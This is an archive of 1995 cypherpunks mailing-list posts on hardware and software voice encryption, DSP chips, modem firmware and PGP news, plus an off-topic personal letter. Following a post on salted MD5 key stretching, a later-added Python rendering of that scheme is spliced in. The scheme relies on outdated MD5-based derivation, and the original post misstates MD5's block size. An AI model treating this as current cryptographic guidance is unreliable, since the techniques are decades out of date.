-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:22:57 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160020.UAA15367@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508152206.SAA23244@acmex.gatech.edu>,
gt7508b@prism.gatech.edu (PHrEaK!) wrote:

>Does anyone know of sources for des chips???
>Are there any public key chips out there???
>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)
>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build.

I don't know off the top of my head who makes DES and RSA chips.  I am
sure there are many manufacturers of DES chips. Try TI, National, and
Motorola. I believe that Schneier has a list of RSA chip makers.

For the DSP part of a "bump in the cord" encryption box, you want to get
the "TI TMS320 Family Development Support" booklet by calling (800)
477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
controller on one chip. I can't recall the exact product number. Just call
Motorola and ask for it.

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE5iSoZzwIn1bdtAQETkgGAjfPRJ09tGSauoSSWuaQiBqeVjI0sWXWH
vJ5Ft3efVPBaZTEMXh0Q4MOkH23ot3hS
=FJ9y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 17:22:50 PDT
To: cypherpunks@toad.com
Subject: TYM_eup
Message-ID: <199508160022.UAA13728@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Time magazine of August 21 has a breathless cover story on
   cyber war, infowar and farside warriors, with a piece on a
   Rocky Horror Rand war game. Someone who knows the URL for
   Time articles may want to wave it.

   Or, for squeamish ossifragers who do not want to be IDed at
   the Time stakeout:


   TYM_eup (about 36kb in 2 parts)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:29:30 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160026.UAA15442@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508152206.SAA23244@acmex.gatech.edu>,
gt7508b@prism.gatech.edu (PHrEaK!) wrote:

>Does anyone know of sources for des chips???
>Are there any public key chips out there???
>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)
>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build.

I don't know off the top of my head who makes DES and RSA chips.  I am
sure there are many manufacturers of DES chips. Try TI, National, and
Motorola. I believe that Schneier has a list of RSA chip makers.

For the DSP part of a "bump in the cord" encryption box, you want to get
the "TI TMS320 Family Development Support" booklet by calling (800)
477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
controller on one chip. I can't recall the exact product number. Just call
Motorola and ask for it.

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE67ioZzwIn1bdtAQGdwQF+MnhFo72hoxjAzESO/MksNE1QKNys35Tp
zJZJxng6FOxikLO01FjmKR32A47Pq7cK
=in6Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:31:31 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160028.UAA15477@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <SAA03565.199508152249@garotte.va.pubnix.com>,
stripes@va.pubnix.com ("Josh M. Osborne") wrote:


>I'm afraid it won't be $50 worth of parts until you start buying
>thousands of chips at once.

For a single device, count on spending ~$400 for hardware.  In large
volumes, you should be able to go below $150.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE7oCoZzwIn1bdtAQFxAAF/YIJPuO5siDuspQhDGf6u+nks1lXfjCj9
z/NZFxQkVsDVv/GvQnPdPKYYr144eVuE
=57Vm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Poldre <jp@jep.pld.ttu.ee>
Date: Tue, 15 Aug 95 10:56:14 PDT
To: John Young <jya@pipeline.com>
Subject: CAT_tal
In-Reply-To: <199508151232.IAA25456@pipe4.nyc.pipeline.com>
Message-ID: <Pine.3.07.9508152055.B12204-5100000@jep.pld.ttu.ee>
MIME-Version: 1.0
Content-Type: text/plain


 CAT_tal (about 15kb) 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 15 Aug 95 20:50:56 PDT
To: cypherpunks@toad.com
Subject: Purple Boxes vs. Native Signal Processing
Message-ID: <ac56b476090210042171@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 AM 8/16/95, Lucky Green wrote:

>I agree. You can easily do encryption and compression on the same chip.
>There is no need for a separate DES/RSA chip. I only included some possible
>DES chip manufacturers, because the original poster asked for them.

The trend is away from having two chips when one will suffice. Thus, the
Macintosh 840av and 660av had a Motorola 68040 _and_ a Motorola 56000 DSP
chip for speech processing and recognition, sound processing, etc....they
were dropped and replaced by the PowerPC machines, which dispensed with the
separate DSP chips. (The DSPs were never fully supported by software,
especially from third party vendors....)

And Intel is pushing "native signal processing," wherein DSP functions are
pushed back into the CPU. If the CPU is fast enough, as the fast Pentiums
are, this can work. This may be partly to sell more and faster Pentiums and
partly because Intel has no effective DSP products at this time.

(Intel has generally missed out on the DSP market, despite arguably having
invented the first DSP chip. In 1977 I worked on the Intel 2920 signal
processor, the first general purpose chip to do signal processing. Invented
by Ted Hoff, the same guy who invented the microprocessor, it was abandoned
a few years later. Then came the success of TI's TMS320 (or similar) DSP
chips, the Motorola 56000 series, and Intel was out of the game.)

Pushing DSP functions into the CPU can be taken too far. Apple, for
example, had/has a "Geo Modem," or something like this, which does modem
functions in the CPU of some machines. Last I heard it was stuck at being
too slow, with no software updates, and effectively is being abandoned.
Modems have gotten so cheap that using the CPU makes little sense if it
also complicates software.

As in everything, the choice in partitioning is crucial.

Of relevance to this list, I see no hope whatsoever that people will buy
gizmos to do encryption if a software-only ("native signal processing")
solution is within a factor of several in performance. After all, people
complain that RSADSI wants "exorbitant" prices ($125) for public key
encryption and demand that "free" products are needed, so I can't see them
spending $300 or even $100 for a hardware solution that does encryption a
bit faster.

If the Pentium + Soundblaster can do VoicePGP or PGPFone or Nautilus, then
what's the incentive to buy additional hardware? Last I heard about CELP,
it could handle "Pretty Good Voice" on a mere 66 MHz 486, and that's about
2-4x slower than what people are routinely buying today.

(The situation may be slightly different for a fully-productized and
consumerized "bump in the wire" secure phones, where the finished product
will be sold to a different sort of customer than those clamoring for cheap
crypto.)

In conclusion, I'd always look to a software solution first. Anything that
requires chips is automatically harder to build and to sell.

Most importantly, a solution which runs on standard hardware available
around the world will be trivially exportable (technologically) and will
spread within days of availability, whereas a hardware-dependent solution
will likely remain obscure and hard to export. Software solutions rule!

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 15 Aug 95 19:47:54 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Purple Boxes
In-Reply-To: <199508160020.UAA15367@bb.hks.net>
Message-ID: <9508160230.AA01456@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


 Lucky Green writes :
> 
> In article <199508152206.SAA23244@acmex.gatech.edu>,
> gt7508b@prism.gatech.edu (PHrEaK!) wrote:
> 
> >Does anyone know of sources for des chips???
> >Are there any public key chips out there???
> >Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
> >slow for realistic real time hardware voice/data encryption??)
> >I know a little about digital electronics (I am a computer engineering
> >student) and I would love to get some data books and see if I could
> >come up with a secure "encryption box" that people could build.
> 
> I don't know off the top of my head who makes DES and RSA chips.  I am
> sure there are many manufacturers of DES chips. Try TI, National, and
> Motorola. I believe that Schneier has a list of RSA chip makers.
> 
	I'm quite convinced that with a fast microcontroller and
especially a really fast DSP engine you can do both 3-DES and idea in
the same hardware that does the rest.  You need only to encrypt
somewhere between 9.6 kbits and 16 kbits per second or between 1 and 2
kbytes/sec or 125 to 250 block encryptions per second which is lots less
than 100+ kbytes/second people have been getting for DES file encryption
on high end PC class processors.  And a good DSP core carefully
programmed is probably quite comparable to the performance of a DX-4 or
mid range Pentium on algorithms such as DES, idea or even RC4. 

	I should think realistically there should be a lot of bandwidth
left over for the voice compression - for the encryption you might
possibly be talking 5% of the dsp cpu if you use a 50 mhz part.

	And while RSA is nice, it has usually been confined to key
exchange because it is so slow.   There are hardware versions of RSA
that will work at modem speeds or better with reasonable moduluses
but this is specialized VLSI hardware and as far as I have ever noticed
is not available cheaply as is the kind of DSP used for V.34 modems.
And certainly doing key exchange RSA on a dsp or 32 bit microcontroller
is reasonable if it only adds a second or two of call setup.

> For the DSP part of a "bump in the cord" encryption box, you want to get
> the "TI TMS320 Family Development Support" booklet by calling (800)
> 477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
> controller on one chip. I can't recall the exact product number. Just call
> Motorola and ask for it.
> 

	I reiterate my suggestion of a few months ago that
one could quite easily adapt the firmware on one of the new simultaneous
data and digital voice on the same phone line modems to incorporate
encryption, and quite possibly encryption/key exchange interoperable
with some mode of PGPphone.   Doing this would relieve one of the
need to develop or manufacture any hardware at all - all that would
be required to have a portable "bump in the cord" encrypter widely
available for a low price would be creating a new version of the
downloadable flash ROM image that did encryption and PGPphone
key exchange.

						Dave Emery

						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@piermont.com
Date: Tue, 15 Aug 95 20:41:58 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
In-Reply-To: <9508160230.AA01456@pig.die.com>
Message-ID: <199508160341.XAA16498@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Dave Emery" writes:
> 	I reiterate my suggestion of a few months ago that
> one could quite easily adapt the firmware on one of the new simultaneous
> data and digital voice on the same phone line modems to incorporate
> encryption, and quite possibly encryption/key exchange interoperable
> with some mode of PGPphone.

Does Rockwell sell voice/data modem chipsets?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ranxerox@ajsbbs.com
Date: Wed, 16 Aug 95 00:18:25 PDT
To: Anne.Stordiau@ping.be
Subject: next letter...
Message-ID: <199508160718.AAA10488@eskinews.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> Pl. teach me about american indians ?
 
What would you like to know...  I'll answer any questions that I can, and
research any that I can't.
 
> From Canada or a US state ?
 
Well, the Chickasaw tribe is originally from the Southeastern US (Alabama,
Kentucky, etc.)  The name (in the native language) means 'Unconquered and
Unconquerable'  During that time, the Chickasaws were mainly
farmers/traders.  But if someone made them mad, they NEVER forgot or forgave
until the debt was settled.
 
Early in the war between the French and English, the English hired the
Chickasaw people to fight for them.  The French didn't stand a chance after
that because of the Chickasaw and their allies.  (When the Chickasaw were
hired, they also asked other tribes to help in the war.)
 
The Chickasaw's real name is spelled Chikasha (chi-KAH-shuh).
 
My 'indian name' is: "Akuckma Kallo Hin-li Nita ho atuk Nutackhish".  (It
means 'Bad-tempered standing bear, he that has a beard.')  And since I am
1.9 - 2m tall and weigh about 150Kg, it kind of fits...  #:^)
 
> I made a blizz trip to California and, when staying at the Canyon's, I had
> the opportunity to visit Indian reserves but didn't want to - don't ask me
> why.  I'm a little disturbed by these "come-and-see-me" touristic
> roundtrips.  Although I saw a lot in a very very short time, I felt
> uncomfortable about looking at "people" as part of the trip.  Stupid?
 
As long as you treat the people with respect and dignity, what is to
be ashamed of?  These displays are done to educate people.  To let them
know more about the tribe, its culture and its history.
 
As long as you keep in mind the idea that it's there to teach, there's
nothing at all wrong with it.
 
There are some ceremonies that aren't done for show.  Like (for example)
the Cheyenne (shy-ANN) Sun Ceremony.  This is a VERY serious thing.  It
lasts for 4 days (4 is an important number).
 
During this ceremony, sacrifices are made.  You can sacrifice some of your
flesh by cutting it off of your own body, or you can sacrifice pain.  If
you choose to sacrifice pain, then there are several options.
 
You can have bone skewers inserted under the muscles in your chest and be
lifted into the air until the skewers tear free (blowing a bone whistle the
whole time).  Or you can have ropes attached to the skewers and the top of
a pole, then you lean back until you break the ropes.  (Again blowing the
whistle.)  Another way is to have Buffalo Skulls attached to the skewers.
You then put the Buffalo skulls on your back and dance until they break
free or tear out of your chest.
 
And all of this is done in the hottest part of the summer. (At a
temperature of about 38C.)
 
> Where do you live now?  How did you evolve from an Indian culture to a
> US-city-bourgeois-like life ?
 
I live about 30Km north of Seattle in a town of 75,000 called Everett.
It's a nice place to live.  Not too much crime except for an occasional
noise complaint.  All things considered, I think it's a nice place to raise
my kid.
 
> > Hobbies : Medieval Warfare (Tactics & Weapons),
> Woops  !
 
Woops?  Is that good or bad?
 
> Sorry I was late in wishing you all the best.  At your age, the world's
> expecting you !
 
Uh oh...   I was hoping to sneak up on it.  #:^)
 
> I won't comment on the maths..  I really hate it, sorry !
 
Most people don't like math...  I guess you have to be a little crazy to
like math.  But I've found that it actually relaxes me.  I sit down and
figure out a new formula, and I feel good that I was able to do it.
 
> Another cultural "question" : what's a "peptic ulcer"?  I know an ulcer as
> being something very painful on your stomach (I never had it, thanks God..)
 
A peptic ulcer IS a hole in the stomach...  I've had the ulcer since I was
9 years old.  It's like a part of the family now.  So I consider it a
'pet'.  I know it sounds crazy, but if I worry about it, it just hurts
more.  It feels like having a belly full of fire as it is.  I don't need it
hurting any more.
 
> Believe it or not, I've been in Washington once but on business trip for
> the AIIM show  (sorry, AIIM stands for Association for Image and Information
> Management - a "huge" yearly show)...  In fact, these business trips are a
> real scandal fly in/fly out without any time for visiting whatsoever because
> of time (and money) constraints..
 
> Forget these negative words, because I really loved all my US trips
> (but was really mad not to be able to spend at least one week in each
> city/state)  I've been in Boston and Lowell/Mass several times, in
 
My uncle teaches music at Berklee Music College near Boston.  Some of his
works have been performed by the New York Philharmonic Orchestra, and the
Zurich Philharmonic Orchestra.  I know NOTHING about music though...  I'm a
scientist, not an artist.
 
> Canada once (the Water Falls, straight from Boston and back the same
 
Niagara Falls?
 
> day), Los Angeles(+ one day Disney Land), Florida(+ one day Disney World -
> waw !!), in Chicago and SanFrancisco twice, in NY three times, and of course
> my "see-the-US-in-10-days" tour which involved the Californian Coast
> (Monterrey, Carmel, SeaWorld, LA) + all canyons, Death Valley, Arizona
> Desert, Scottsdale, etc.
 
I went down to California a few years ago to meet some friends.  Haven't
been back though...  :(
 
> When I re-read this, I have no right to complain : I loved it all and
> won't stop coming over...  Next year, I hope to conquer Canada while one
> holiday. (The AIIM show will be in Chicago again in 1996).
 
If you like being in the outdoors, you may want to consider going to Alaska
(Denali National Park) or the Canadian Northwest Territories.
 
> By the way, your US map (on my computer) is a little bubbled..
 
What do you mean 'bubbled'?  It didn't come out right?
 
> But don't worry, I have great maps and books and videos and whatever
> on the States at home. I have even family in the Concorde/Mass. and
> in the Vermont.
 
My girlfriend is originally from Connecticut, and I always tease her about
it.  I tell her that if my friends knew that my girlfriend was a 'damn
yankee', they'd never let me hear the end of it.
 
> all my internet drugs, except when it's football on TV...)
 
Football = Soccer I presume...  Over here 'Football' is a completely
different game.  I used to play it in school when I was about 16 years
old.  (Ever seen/heard of 'The Dallas Cowboys'?)
 
> I'll come back to you soon (we have a four days week-end here as from
> Saturday).
 
Hope you enjoy your weekend.
 
> PS :            Thanks for all info about the net.. Where did you learn
>                 French?  (Escargot..)
 
I don't know French...  I know food.  At 150Kg, I know food...  #:^)
 
 
Hope to hear from you again soon...
 
Paul
ranxerox@ajsbbs.com
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 16 Aug 95 01:48:30 PDT
To: die@die.com
Subject: Re: Purple Boxes
Message-ID: <199508160843.BAA25109@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 8/15/95 -0400, Dave Emery wrote:
>	I reiterate my suggestion of a few months ago that
>one could quite easily adapt the firmware on one of the new simultaneous
>data and digital voice on the same phone line modems to incorporate
>encryption, and quite possibly encryption/key exchange interoperable
>with some mode of PGPphone.   Doing this would relieve one of the
>need to develop or manufacture any hardware at all - all that would
>be required to have a portable "bump in the cord" encrypter widely
>available for a low price would be creating a new version of the
>downloadable flash ROM image that did encryption and PGPphone
>key exchange.

Most modems I've seen only have one set of audio interfaces,
and a bump-in-the-cord phone needs two (one for the voice side,
one for the modem line side.)  (Having two jacks doesn't count.)
So you'd need at least two modems, one straight and one re-educated,
and you'd probably need lots more flash ROM than the average modem has.

On the other hand, laptops are increasingly getting multimedia capabilities
like built-in sound cards, and if there's a microphone jack you're in 
business (uh, well, for $3K or so)   Or a cheaper laptop with two PCMCIA modems,
if you can re-educate one, which also lets you move the non-audio parts
of your secure phone program into the PC.  Of course, if you want long
conversations from the airport, you'll still need to find a payphone
within 4-6 feet of an electric socket and not located under a MegaMuzak speaker,
but that's easier than trying to balance a TI Silent 700 under similar
conditions :-)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 16 Aug 95 03:32:56 PDT
To: perry@piermont.com
Subject: Re: Purple Boxes
In-Reply-To: <199508160341.XAA16498@frankenstein.piermont.com>
Message-ID: <m0sifm2-001eINC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


perry@piermont.com wrote:
> 
> 
> "Dave Emery" writes:
> > 	I reiterate my suggestion of a few months ago that
> > one could quite easily adapt the firmware on one of the new simultaneous
> > data and digital voice on the same phone line modems to incorporate
> > encryption, and quite possibly encryption/key exchange interoperable
> > with some mode of PGPphone.
> 
> Does Rockwell sell voice/data modem chipsets?


Do bears crap in the woods? ;-)

My PP14.4 uses a Rockwell chipset with caller ID built in.

 


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 16 Aug 95 03:35:03 PDT
To: monty.harder@famend.com
Subject: Re: An article for Wired magazine
In-Reply-To: <8AF3490.0003000322.uuout@famend.com>
Message-ID: <m0sifns-001eIXC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


MONTY HARDER wrote:
> 
> PE> kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
> PE> defy governments to eliminate gold as well as paper currency.
> 
>   Um. Didn't FDR try that?

Didn't a lot of sheep let him get away with it?



-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 05:15:55 PDT
To: cypherpunks@toad.com
Subject: PGP use in Guatemala?
Message-ID: <199508161214.IAA25845@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear Cypherpunks:

Could someone please send me (hopefully documented) examples of PGP
use and the government reaction to it in Guatemala or point me to
where to find articles (if there are any) on the subject?
Please reply privately to  liberty@gate.net
Thanks.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDHgEm1lp8bpvW01AQHVpwQAhS16CfDaRcqPHNkbanIWGJ1qchjsBoqZ
Or4rxTLNm9LpvMjoiptR8Myo09YaEnYzm38nw4CW4YyMtEVFde99teL0VzSNyYTm
YPL0COTcB6Sw5Ti1w3yjQsKEaMnX1homGRRIFmGpTP9KZfrq/nt193Jw1WySzsMe
zad0RqPCgOM=
=v2J6
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 16 Aug 95 07:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
In-Reply-To: <SAA03523.199508152240@garotte.va.pubnix.com>
Message-ID: <199508161458.IAA12814@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> >You might want to do something fancy like choose a random salt,
> >use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
> >This makes pre-computation much less useful (unless you're careless
> >and use MD5(key,salt) instead of MD5(salt,key)...), and means that
> >you use a different session key for each batch of stuff you encrypt,
> >even though you're using the same key.  If you're paranoid about replay
> >attacks, you could let some of the bits of the salt be random and some 
> >be a counter, and never accept a key smaller than the one from the
> >previous successfully-decrypted message.
> 
> Hmmmm, so I should put the salt in the clear at the start of the file?
> This looks like an interesting idea.

What I do in Curve Encrypt for the Mac is use the MD5 of the pass phrase,
a 128-bit random salt (overkill is cheap here) and a one-byte counter field
passed repeatedly through MD5, like this:

<bare key> = MD5[<pass phrase>]
<salt> = 128 bits of randoms
<counter> = 0

MD5Init()
for (a tenth of a second)
	MD5Update[<counter><key><salt><key><salt>]
	<counter> = <counter> + 1

<key> = MD5Final()

At startup, the program determines how many iterations of MD5Update can be
accomplished in a tenth of a second on the current CPU, and the loop is run
that many times. The number of iterations and the salt are stored with the
encrypted file, in the clear. The point to the <counter><key><salt><key><salt>
concatenation is that this buffer is 65 bytes long, and MD5 works on 64-bit
blocks, so that the buffer is shifted by one byte in the MD5 block each
iteration, making precomputation of the MD5 addition steps more of a pain.
Also note that the buffer is _not_ repeatedly MD5-hashed, but repeatedly sent
to MD5Update() instead. This is out of fear that there might be fixed-points
in the hash algorithm.


                                    -- Will
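
The key-stretching loop described above, written out as an added example (this is not Curve Encrypt's source). The header layout, the function names, the wrapping of the one-byte counter, and the reading of <key> inside the loop as the bare MD5 of the pass phrase are assumptions; MD5's block size is taken as 64 bytes.

```python
import hashlib
import os
import struct
import time

KEY_LEN = 16     # MD5 digest size in bytes
SALT_LEN = 16    # the 128-bit salt from the post
BUF_LEN = 1 + 2 * (KEY_LEN + SALT_LEN)   # <counter><key><salt><key><salt> = 65
MD5_BLOCK = 64   # MD5 consumes input in 64-byte (512-bit) blocks


def calibrate(target_seconds: float = 0.1) -> int:
    """Count how many 65-byte MD5 updates fit in target_seconds on this CPU."""
    ctx = hashlib.md5()
    buf = bytes(BUF_LEN)
    count = 0
    deadline = time.perf_counter() + target_seconds
    while time.perf_counter() < deadline:
        ctx.update(buf)
        count += 1
    return max(count, 1)


def derive_key(pass_phrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Stretch a pass phrase with one running MD5 fed `iterations` buffers."""
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be 128 bits")
    if iterations < 1:
        raise ValueError("iterations must be at least 1")
    bare_key = hashlib.md5(pass_phrase).digest()
    ctx = hashlib.md5()   # a single context; the digest is taken once, at the end
    for i in range(iterations):
        counter = bytes([i % 256])   # assumption: the one-byte counter wraps
        ctx.update(counter + bare_key + salt + bare_key + salt)
    return ctx.digest()


def buffer_offsets(iterations: int) -> list:
    """Offset inside an MD5 block at which each iteration's buffer starts."""
    return [(i * BUF_LEN) % MD5_BLOCK for i in range(iterations)]


def pack_header(salt: bytes, iterations: int) -> bytes:
    """Salt and iteration count travel in the clear (layout is an assumption)."""
    return struct.pack(">16sI", salt, iterations)


def unpack_header(header: bytes):
    """Recover (salt, iterations) from the first 20 bytes of a file."""
    return struct.unpack(">16sI", header[:20])


if __name__ == "__main__":
    # Writer: pick a salt, size the loop for this machine, derive the key.
    salt = os.urandom(SALT_LEN)
    iterations = calibrate(0.1)
    key = derive_key(b"constructed sample pass phrase", salt, iterations)
    header = pack_header(salt, iterations)

    # Reader: everything but the pass phrase comes from the clear header.
    salt2, iterations2 = unpack_header(header)
    assert derive_key(b"constructed sample pass phrase", salt2, iterations2) == key
    assert derive_key(b"wrong guess", salt2, iterations2) != key
    print("iterations:", iterations, "key:", key.hex())
    print("first buffer offsets:", buffer_offsets(5))
```

Because the iteration count is stored with the file, a reader on a slower machine still derives the same key; it just takes longer than a tenth of a second. A purpose-built password KDF such as PBKDF2, scrypt or Argon2 is what one would reach for today.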





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Aug 95 06:08:44 PDT
To: cypherpunks@toad.com
Subject: PRZ Wins One
Message-ID: <199508161308.JAA18682@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   PRZ is awarded a 1995 Chrysler Award for Innovation in
   Design, says a $40,000 full-page ad in The NYT today, with
   a brief citation:

      Philip Zimmermann is the designer of Pretty Good Privacy
      (PGP), an E-mail encryption software. Thanks to the
      algorithms of PGP, which was released to the public as
      free software in 1991, E-mail messages can be sent
      securely all over the world without the risk of
      interception by any third party.

   No mention of the free-world leader's sword poised to
   decapitalize the public-spirited designer to protect IC
   hegemony.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Wed, 16 Aug 95 06:46:58 PDT
To: cypherpunks@toad.com
Subject: Zimmermann wins Chrysler Award
Message-ID: <Pine.SUN.3.91.950816090632.24108A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a full-page ad on page A9 of today's Wall Street Journal
announcing the winners of the "1995 Chrysler Award of Innovation in
Design."  One of the six winners is Phil Zimmermann.  I quote:

"Philip Zimmermann is the designer of Pretty Good Privacy (PGP), an
E-mail encryption software.  Thanks to the algorithms of PGP, which
was released to the public as free software in 1991, E-mail messages
can be sent securely all over the world without risk of interception
by any third party."

In case you're interested:

"For the past three years, Chrysler Corporation has been honoring
outstanding designers.  By showcasing great innovations in fields such
as graphic, interactive, product, architectural, and environmental
designs, Chrysler strives to bring well-deserved attention to those
designers whose common attribute is a passionate commitment to their
vision."

Among the other winners: the hip graphic design group Reverb and
"carceral" architect Frank Gehry.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Wed, 16 Aug 95 07:29:42 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes vs. Native Signal Processing
Message-ID: <v02130500ac57a71f4744@[128.101.96.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:58 pm 8/15/95, Timothy C. May wrote:

[snip]
>The trend is away from having two chips when one will suffice. Thus, the
>Macintosh 840av and 660av had a Motorola 68040 _and_ a Motorola 56000 DSP
[snip]
>Pushing DSP functions into the CPU can be taken too far. Apple, for
>example, had/has a "Geo Modem," or something like this, which does modem
>functions in the CPU of some machines. Last I heard it was stuck at being
>too slow, with no software updates, and effectively is being abandoned.
[snip]

My apologies if this is being too compulsive but for reasons of accuracy
it should be pointed out that the DSP in the Mac 660av and also the 840av
is the AT&T 3210.

The other point I'd make is more a matter of opinion. The Geopod and
associated software has been excellent and revisions have just recently
been released by Apple and Cypress Research. The phone capability is
particularly well designed. This is in marked contrast to the demo
program called ApplePhone which was mistakenly treated as an attempt at a
finished product when it was just intended as a technology demonstration.
It took an unusually long time for MegaPhone, the finished product from
Cypress Research, to finally appear. As far as speed is concerned there
is impatience about the 14,400 bps limit and that remains the major
shortcoming. But even that may be corrected by Apple before too much
longer.

